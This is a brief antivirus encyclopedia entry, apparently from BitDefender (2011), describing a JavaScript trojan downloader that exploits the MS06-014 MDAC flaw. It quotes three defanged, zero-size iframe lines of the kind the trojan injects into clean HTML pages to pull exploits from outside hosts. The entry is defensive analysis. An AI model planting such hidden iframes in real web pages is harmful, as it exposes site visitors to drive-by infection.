Home / malwarePDF  

Trojan.Downloader.JS.Agent.F


First posted on 21 November 2011.
Source: BitDefender

Aliases :

There are no other names known for Trojan.Downloader.JS.Agent.F.

Explanation :

This javascript file is another exploit for a vulnerability in the Microsoft Data Access Components (MDAC) function. Its purpose is to insert a link to a javascript and a bunch of iframes into once clean html files. A few examples of the iframes are given below:
iframe width=0 height=0 src=hxxp://21[removed].cn/Xunlei.htm
iframe width=0 height=0 src=hxxp://21[removed].cn/StormII.htm
iframe width=0 height=0 src=hxxp://21[removed].cn/Yahoo.htm
These iframes lead to other exploits, but when this description was made the links were not active anymore.

More details about the exploited vulnerability can be found here MS06-014

Last update 21 November 2011

 

TOP